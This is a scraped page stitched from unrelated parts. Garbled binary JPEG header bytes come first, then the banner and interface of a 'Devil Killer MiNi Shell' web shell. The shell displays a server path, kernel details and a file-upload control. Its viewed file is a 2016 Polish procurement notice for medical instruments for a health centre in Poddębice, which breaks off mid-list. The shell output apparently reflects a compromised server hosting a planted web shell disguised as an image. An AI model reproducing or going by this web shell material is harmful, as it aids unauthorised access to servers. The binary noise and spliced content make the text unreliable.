JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160622/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160622/99409-N-2016.html

<p class="kh_header"><b>Poddębice: Dostawy narzędzi medycznych i wielorazowego sprzętu medycznego oraz sprzętu do rehabilitacji dla Poddębickiego Centrum Zdrowia Sp. z o.o. w Poddębicach</b><br>
<b>Numer ogłoszenia: 99409 - 2016; data zamieszczenia: 22.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> "Poddębickie Centrum Zdrowia"spółka z o.o. , ul. Mickiewicza 16, 99-200 Poddębice, woj. łódzkie, tel. 43 828 82 50, faks 43 828 82 55.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.nzozpcz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka z ograniczoną odpowiedzialnością.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy narzędzi medycznych i wielorazowego sprzętu medycznego oraz sprzętu do rehabilitacji dla Poddębickiego Centrum Zdrowia Sp. z o.o. w Poddębicach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia są dostawy narzędzi medycznych i wielorazowego sprzętu medycznego oraz sprzętu do rehabilitacji dla Poddębickiego Centrum Zdrowia Sp. z o.o. w Poddębicach, z podziałem na 12 pakietów w ilościach i asortymencie szczegółowo określonych w Załączniku nr 4 do SIWZ - Formularz cenowy. 
Kod CPV: 33.10.00.00-1, 33.16.90.00-2, 33.16.22.00-5, 18.52.10.00-7, 37.44.00.00-4, 33.15.00.00-6, 37.44.10.00-1, 37.44.19.00-0, 37.42.60.00-0, 37.44.17.00-8.
2.	Szczegółowy opis przedmiotu zamówienia wraz z podaniem wymaganych przez zamawiającego parametrów został szczegółowo określony w Formularzu cenowym - Załącznik nr 4 do SIWZ.
3.	Przedmiot zamówienia musi być dopuszczony do obrotu i używania zgodnie z przepisami ustawy z dnia 20 maja 2010 r. o wyrobach medycznych (Dz.U. z 2010, nr 107 poz. 679z późn. zm.) i posiadać deklarację zgodności CE - dotyczy Pakietu nr 1.
4.	Przedmiot zamówienia musi być dopuszczony do obrotu i używania na terytorium Rzeczypospolitej Polskiej i posiada znak zgodności CE - dotyczy Pakietu nr 2 - 12.
5.	Przedmiot zamówienia musi być fabrycznie nowy, niepowystawowy, nieregenerowany, wyprodukowany w 2016 roku, wolny od wad fizycznych i prawnych, kompletny i gotowy do pracy, bez dodatkowych kosztów. 
6.	Warunki realizacji przedmiotu zamówienia określa Wzór umowy dla Pakietu nr 1 - Załącznik Nr 2 do SIWZ oraz Wzór umowy dla Pakietu nr 2-12 - Załącznik Nr 3 do SIWZ.
7.	Wykonawca zobowiązany jest do dostarczania sprzętu medycznego w terminie do max. 28 dni kalendarzowych od chwili złożenia zamówienia przez Zamawiającego za pośrednictwem faxu - dotyczy Pakietu nr 1. 
8.	Termin wykonania zamówienia ustala się na okres max. do 14 dni, licząc od dnia podpisania umowy - dotyczy Pakietów nr 2- 12.
9.	Jeżeli w czasie wykonywania przedmiotu zamówienia Wykonawca będzie zlecał część dostawy innym podmiotom, zobowiązany jest wpisać zakres tych części dostaw w pkt. 13 załącznika nr 1 do SIWZ - Formularz ofertowy.
10.	Zamawiający nie zamierza ustanawiać dynamicznego systemu zakupów.
11.	W przypadku, gdy przedmiot zamówienia został określony poprzez wskazanie znaków towarowych, patentów lub pochodzenia, Wykonawca może zaoferować preparaty równoważne. Zamawiający wymaga, aby użyte materiały, o ile są inne, posiadały parametry jakościowe i techniczne nie gorsze niż określone w przedmiocie zamówienia. Wykazanie równoważności zaoferowanego przedmiotu spoczywa na Wykonawcy..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1, 33.16.90.00-2, 33.16.22.00-5, 18.52.10.00-7, 37.44.00.00-4, 33.15.00.00-6, 37.44.10.00-1, 37.44.19.00-0, 37.42.60.00-0, 37.44.17.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 12.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku.
Zamawiający uzna, że Wykonawca spełnił w/w warunek, jeżeli  złoży oświadczenie o spełnianiu warunków o których mowa w art. 22 ust. 1 pkt. 1-4 ustawy Prawo zamówień publicznych, które stanowi załącznik nr 5 do SIWZ.
Ocena spełniania warunku udziału w postępowaniu dokonywana będzie w oparciu o złożony dokument metodą warunku granicznego spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku.
Zamawiający uzna, że Wykonawca spełnił w/w warunek, jeżeli  złoży oświadczenie o spełnianiu warunków o których mowa w art. 22 ust. 1 pkt. 1-4 ustawy Prawo zamówień publicznych, które stanowi załącznik nr 5 do SIWZ.
Ocena spełniania warunku udziału w postępowaniu dokonywana będzie w oparciu o złożony dokument metodą warunku granicznego spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku.
Zamawiający uzna, że Wykonawca spełnił w/w warunek, jeżeli  złoży oświadczenie o spełnianiu warunków o których mowa w art. 22 ust. 1 pkt. 1-4 ustawy Prawo zamówień publicznych, które stanowi załącznik nr 5 do SIWZ.
Ocena spełniania warunku udziału w postępowaniu dokonywana będzie w oparciu o złożony dokument metodą warunku granicznego spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku.
Zamawiający uzna, że Wykonawca spełnił w/w warunek, jeżeli  złoży oświadczenie o spełnianiu warunków o których mowa w art. 22 ust. 1 pkt. 1-4 ustawy Prawo zamówień publicznych, które stanowi załącznik nr 5 do SIWZ.
Ocena spełniania warunku udziału w postępowaniu dokonywana będzie w oparciu o złożony dokument metodą warunku granicznego spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku.
Zamawiający uzna, że Wykonawca spełnił w/w warunek, jeżeli  złoży oświadczenie o spełnianiu warunków o których mowa w art. 22 ust. 1 pkt. 1-4 ustawy Prawo zamówień publicznych, które stanowi załącznik nr 5 do SIWZ.
Ocena spełniania warunku udziału w postępowaniu dokonywana będzie w oparciu o złożony dokument metodą warunku granicznego spełnia/nie spełnia.
W ogólnym zakresie spełnienia warunków o których mowa w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych, Wykonawca zobligowany jest do złożenia oświadczenia, którego treść stanowi załącznik nr 5 do SIWZ.

Ocena spełniania w/w warunków dokonana zostanie na zasadzie spełnia/nie spełnia w oparciu o informacje zawarte w dokumentach wymienionych w pkt. 8 SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki Wykonawca spełnił.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1. Opisy/ prospekty/ katalogi/ instrukcje obsługi (w języku polskim) oferowanego przedmiotu zamówienia na potwierdzenie posiadania wymaganych przez Zamawiającego parametrów określonych w Załączniku Nr 4 do SIWZ - Formularz cenowy - dla Pakietu nr 1 - 12.
2. Deklaracje zgodności z aktualną ustawą o wyrobach medycznych lub Dyrektywą UE nr 93/42/EWG, na zaoferowane narzędzia medyczne i wielorazowy sprzęt medyczny - dla Pakietu nr 1.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Inne dokumenty wymagane SIWZ:
1. Formularz cenowy - Załącznik Nr 4 do SIWZ.

Informacja o zawartości oferty:
Ofertę stanowi: 
Formularz ofertowy - wypełniony i podpisany przez osoby upoważnione do reprezentowania  Wykonawcy (zgodnie z dokumentem określającym  status prawny Wykonawcy lub dołączonym do oferty pełnomocnictwem) stanowiący załącznik nr 1 do SIWZ.

Dokumenty składane z ofertą:
-	Oświadczenia i dokumenty wymienione w pkt 8.1-8.6 SIWZ.
-	Formularz cenowy - Załącznik Nr 4 do SIWZ.


Zamawiający informuje:
Jeżeli oferta zawiera informacje, które stanowią tajemnicę przedsiębiorstw w rozumieniu ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji, składający ofertę zobowiązany jest do oznakowania i oddzielenia od części jawnej złożonej oferty oraz poprzedzenia oświadczeniem o zakazie udostępniania odpowiednio oznaczonych stron oraz wykazaniem dlaczego stanowią one tajemnicę przedsiębiorstwa.

Nie ujawnia się informacji stanowiących tajemnicę przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji, jeżeli wykonawca, nie później niż w terminie składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu, zastrzegł, że nie mogą być one udostępniane oraz wykazał, iż zastrzeżone informacje stanowią tajemnicę przedsiębiorstwa. Wykonawca nie może zastrzec informacji, o których mowa w art. 86 ust. 4 ustawy Prawo zamówień publicznych. 

Jeżeli ofertę i załączniki podpisuje osoba inna niż wynika to ze złożonych dokumentów wówczas musi być wraz z ofertą złożony oryginał pełnomocnictwa lub jego kserokopia potwierdzona za zgodność z oryginałem przez notariusza. Treść dokumentu stanowiącego pełnomocnictwo musi zawierać zapis do jakich czynności osoba ta ma uprawnienie.

Dokumenty wymienione w rozdziale 8 SIWZ mogą być składane w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez uprawnioną osobę do reprezentowania podmiotu - wykonawcę. W przypadku nieczytelnej kserokopii, lub gdy kopia budzi wątpliwości co do jej prawdziwości, Zamawiający wezwie Wykonawcę do okazania oryginału dokumentu lub notarialnie poświadczonej kopii tego dokumentu. 
Dokumenty sporządzone w języku obcym muszą być składane wraz z tłumaczeniem na język polski, poświadczone za zgodność z oryginałem przez uprawnioną osobę do reprezentowania podmiotu - wykonawcę. 

Wykonawcy, którzy mają siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej.
Wykonawca, który ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, 
1.	zamiast dokumentów, o których mowa w pkt. 8.2 składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości,
2.	dokumenty określone w pkt 1 lit. a  powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
3.	Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym  wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów określonych powyżej, zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także  osoby uprawnione do reprezentacji Wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem. Dokumenty te powinny być wystawione w terminach określonych w pkt 2.

Podmioty występujące wspólnie:
W przypadku, gdy wykonawcą są podmioty występujące wspólnie muszą załączyć do oferty pełnomocnictwo rodzajowe na mocy którego wspólnicy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu lub reprezentowania ich w postępowaniu przetargowym i zawarciu umowy /dotyczy również spółek cywilnych utworzonych przez osoby fizyczne, zamiast tego dokumentu może być załączona umowa spółki/. Ponadto dokument ten musi zawierać nazwę podmiotów wspólnych i wskazanie zakresu działania każdego z nich.
Do dnia podpisania umowy z zamawiającym podmioty występujące wspólnie, których oferta została wybrana jako najkorzystniejsza, muszą podpisać umowę /dla spółek cywilnych może to być umowa spółki/. Nie może ona być zawarta na czas krótszy niż okres realizacji umowy z zamawiającym. Zamiast powyższego dokumentu zamawiający dopuszcza złożenie wraz z ofertą umowy o wspólnej działalności. Umowa ta będzie załącznikiem do umowy z zamawiającym. Każdy z podmiotów występujących wspólnie ma obowiązek złożyć dokumenty określone w SIWZ w pkt. 8.2 - 8.4. Pozostałe dokumenty wymienione w pkt. 8 SIWZ wykonawcy składają wspólnie i muszą one wykazywać wspólne spełnienie warunków udziału w postępowaniu.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Termin dostawy - 10</li>
<li>3 - Termin płatności - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmiany postanowień umowy dotyczących Pakietu nr 1 w następujących przypadkach:
1.	Zamawiający przewiduje możliwość wprowadzenia zmiany w umowie w przypadku zaprzestania produkcji którejkolwiek z części asortymentu będącego przedmiotem umowy, wówczas Wykonawca zobowiązuje się do niezwłocznego potwierdzenia stosownym dokumentem zaprzestania wytwarzania wyrobu oraz do przedstawienia Zamawiającemu propozycji zamiennika takiego wyrobu o parametrach nie gorszych niż zaoferowane w przetargu w cenie zaoferowanej za przedmiot umowy w przetargu lub cenie korzystniejszej dla Zamawiającego niż w przetargu. Zmiana umowy w tym zakresie nastąpi po pisemnym zaakceptowaniu przez Zamawiającego propozycji zamiennika.
2.	Dopuszcza się zmianę postanowień zawartej umowy polegającą na obniżeniu ceny jednostkowej przedmiotu umowy np. w przypadku okresowych promocji cenowych towaru, stosowanych przez producentów. Strony uzgadniają że w tym okresie dostawy towarów wyszczególnionych w załączniku nr 1 do umowy będą realizowane przez Wykonawcę po cenach niższych, uwzględniających promocję cenową, po wcześniejszym poinformowaniu Zamawiającego w formie pisemnej.
3.	Dopuszcza się zmianę postanowień zawartej umowy w stosunku do treści  oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku zmiany przez producenta zaoferowanego wyrobu numeru katalogowego lub nazwy z zachowaniem wymogów określonych w opisie przedmiotu zamówienia dla danego wyrobu. 
4.	Dopuszcza się zmiany stawki podatku VAT, które to obowiązują z chwilą wprowadzenia ich stosowanymi przepisami, w tej sytuacji cena jednostkowa netto nie ulega zmianie.

Zamawiający nie dopuszcza zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy - dotyczy Pakietu nr 2-12.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.nzozpcz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Poddębickie Centrum Zdrowia Sp. z o.o., 99-200 Poddębice ul. Mickiewicza 16, Zamówienia Publiczne, pokój nr 15..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.07.2016 godzina 10:00, miejsce: Poddębickie Centrum Zdrowia Sp. z o.o., 99-200 Poddębice ul. Mickiewicza 16 Budynek Administracji, I piętro - Sekretariat Zarządu.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> PAKIET NR 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Rozszerzacz do tchawicy typ Trosseau, dwuszczękowy, dł. 120 - 140 mm	szt.	1;
2.	Skrobaczka, prosektor (typ FREER), dwustronna, ostra, dł. 185 mm	szt.	1;
3.	Hak ostry, automatyczny 3-zębny, dł. 130 mm	szt.	2;
4.	Kaniula ssąca z mandarynem, zakrzywiona pod kątem, średnica 4mm, dł. 11cm	 szt.	2;
5.	Nożyce krtaniowe do laryngectomii z przekładnią, odgięte, branża tnąca ząbkowana dł. 200-220 mm	szt.	1;
6.	Kleszczyki do wycinania małżowiny nosowej, dł. 125 mm, średnica 2,7 mm	szt.	1;
7.	Końcówka do odsysania dł. 285-295 mm, średnica końcówki 1cm	szt.	2;
8.	Hak ostry 4- zębny, dł. 215 mm	szt.	4;
9.	Kleszczyki naczyniowe do tonsylectomii, lekko odgięte, przerwane ucho, dł. 185-190 mm	szt.	2;
10.	Kleszczyki preparacyjne, odgięte dł. 180 mm	szt.	1;
11.	Nożyczki preparacyjne typ Reynolds dł. 145-150 mm	szt.	1;
12.	Hak ostry 2- zębny, dł. 215 mm	szt.	7;
13.	Pinceta anatomiczna z uzębieniem atraumatycznym typ DE BAKEY dł. 200 mm (naczyniowa)	szt.	3;
14.	Pinceta chirurgiczna 2 x 3 ząbki dł. 160 mm	szt.	1;
15.	Raspator ssący z mandarynem dł. 180 mm, końcówka ssąca średnica 4 mm	szt.	1;
16.	Hak operacyjny typ Mini - Langenbeck, dł. 160 mm	szt.	4;
17.	Bezpieczny, wielorazowy trzonek skalpela (umożliwiający bezpieczne zdjęcie ostrza za pomocą jednej ręki, bez użycia dodatkowych narzędzi) ze stali nierdzewnej, nr 3	szt.	5;
18.	Imadło, dł. 150 mm	szt.	2;
19.	Nożyczki preparacyjne typ Metzenbaum, proste dł. 180-185 mm, końce tępe	szt.	3;
20.	Nożyczki preparacyjne typ Metzenbaum, proste dł. 140 mm, końce tępe	szt.	2;
